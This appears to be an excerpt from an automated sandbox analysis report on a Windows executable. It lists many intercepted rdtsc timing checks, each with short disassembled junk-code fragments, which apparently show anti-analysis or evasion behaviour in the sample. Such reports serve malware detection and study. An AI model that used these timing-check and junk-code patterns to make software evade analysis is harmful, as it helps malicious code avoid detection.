Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66589F second address: 6658A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665A1D second address: 665A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665A22 second address: 665A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665B86 second address: 665B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665B8A second address: 665B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665CDE second address: 665CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665CE2 second address: 665D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC35h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665E6B second address: 665E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA29 second address: 66BA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA31 second address: 66BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA37 second address: 66BA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA3C second address: 66BA49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F6C54B58546h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA49 second address: 66BA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F6C544CAC2Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F6C544CAC56h 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6C544CAC36h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA84 second address: 66BA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA88 second address: 66BA8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A6CB second address: 66A6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6C54B58546h 0x0000000a jmp 00007F6C54B58550h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A6E5 second address: 66A738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C544CAC2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F6C544CAC45h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007F6C544CAC53h 0x00000019 pushad 0x0000001a jg 00007F6C544CAC26h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 jl 00007F6C544CAC26h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADB5 second address: 66ADD4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C54B58548h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F6C54B58552h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADD4 second address: 66ADDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADDA second address: 66ADF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58554h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADF9 second address: 66AE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6C544CAC26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE05 second address: 66AE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6C54B5854Fh 0x0000000c jmp 00007F6C54B5854Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE29 second address: 66AE4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 jno 00007F6C544CAC26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE4C second address: 66AE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE52 second address: 66AE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC34h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE6F second address: 66AE73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B162 second address: 66B183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007F6C544CAC26h 0x0000000c popad 0x0000000d jmp 00007F6C544CAC34h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B183 second address: 66B19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C54B58554h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ED02 second address: 66ED1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC33h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ED1B second address: 66ED20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671C58 second address: 671C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671C61 second address: 671C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58551h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717EA second address: 6717F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717F0 second address: 6717FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C54B58546h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 673491 second address: 67349C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67349C second address: 6734A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6734A0 second address: 6734BB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C544CAC26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6C544CAC2Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6734BB second address: 6734C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6734C1 second address: 6734EA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C544CAC3Fh 0x00000008 jnp 00007F6C544CAC2Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3546 second address: 5E355B instructions: 0x00000000 rdtsc 0x00000002 js 00007F6C54B58546h 0x00000008 jnc 00007F6C54B58546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E355B second address: 5E3561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3561 second address: 5E35B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C54B58546h 0x0000000a popad 0x0000000b pop esi 0x0000000c push esi 0x0000000d push ecx 0x0000000e jmp 00007F6C54B58554h 0x00000013 jmp 00007F6C54B58557h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6C54B58555h 0x00000020 jnl 00007F6C54B58546h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67794D second address: 67796E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6C544CAC37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67796E second address: 677972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67728A second address: 67728E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67728E second address: 677294 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677294 second address: 6772A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6C544CAC2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6773EE second address: 6773F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677534 second address: 677547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC2Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677547 second address: 677550 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677550 second address: 677556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677695 second address: 67769B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67769B second address: 6776AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F6C544CAC26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6776AB second address: 6776AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6776AF second address: 6776B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6776B5 second address: 6776BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B77A second address: 67B784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6C544CAC26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AE41 second address: 67AE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58558h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AFB6 second address: 67AFC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B13C second address: 67B142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B142 second address: 67B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B45C second address: 67B462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B462 second address: 67B488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC33h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jns 00007F6C544CAC2Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B488 second address: 67B4DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F6C54B58546h 0x00000009 jmp 00007F6C54B58555h 0x0000000e jmp 00007F6C54B58553h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 jng 00007F6C54B5855Ch 0x0000001d jmp 00007F6C54B58556h 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B4DF second address: 67B4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9A1 second address: 67E9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9A5 second address: 67E9B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6C544CAC26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9B5 second address: 67E9E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Dh 0x00000007 jmp 00007F6C54B58557h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9E3 second address: 67E9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC38h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9FF second address: 67EA0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F6C54B5854Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECA4 second address: 67ECAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECAA second address: 67ECAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECAE second address: 67ECC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECC9 second address: 67ECCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F0FA second address: 67F120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC37h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F120 second address: 67F126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F126 second address: 67F12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F12A second address: 67F12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F12E second address: 67F15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6C544CAC32h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6C544CAC2Ah 0x00000016 jo 00007F6C544CAC26h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F15B second address: 67F179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F179 second address: 67F183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C544CAC26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F183 second address: 67F189 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F306 second address: 67F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6C544CAC26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685D23 second address: 685D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58557h 0x00000007 jmp 00007F6C54B58557h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F6C54B58560h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F6C54B58558h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685D79 second address: 685D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685D7D second address: 685DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C54B58552h 0x00000011 pushad 0x00000012 jmp 00007F6C54B58550h 0x00000017 jmp 00007F6C54B5854Bh 0x0000001c jmp 00007F6C54B5854Ch 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684462 second address: 68446E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684765 second address: 68477D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6C54B5854Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684A60 second address: 684A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684A64 second address: 684AEC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C54B58546h 0x00000008 jmp 00007F6C54B5854Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F6C54B58558h 0x00000015 jmp 00007F6C54B58553h 0x0000001a jmp 00007F6C54B58550h 0x0000001f popad 0x00000020 pushad 0x00000021 push edi 0x00000022 pop edi 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 jmp 00007F6C54B58550h 0x0000002a jne 00007F6C54B58546h 0x00000030 popad 0x00000031 push ecx 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 pop ecx 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F6C54B58554h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684AEC second address: 684AF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684C87 second address: 684CD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58558h 0x00000007 jmp 00007F6C54B58553h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007F6C54B5854Dh 0x00000014 pop esi 0x00000015 pushad 0x00000016 jne 00007F6C54B58546h 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EBF4 second address: 62EBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EBF8 second address: 62EC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C54B5854Eh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f xor ch, FFFFFF8Dh 0x00000012 mov ebx, dword ptr [ebp+1248DB68h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F6C54B58548h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jnl 00007F6C54B58546h 0x00000038 add eax, ebx 0x0000003a js 00007F6C54B5854Ch 0x00000040 mov edx, dword ptr [ebp+124628F0h] 0x00000046 push eax 0x00000047 pushad 0x00000048 jnc 00007F6C54B5854Ch 0x0000004e push ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
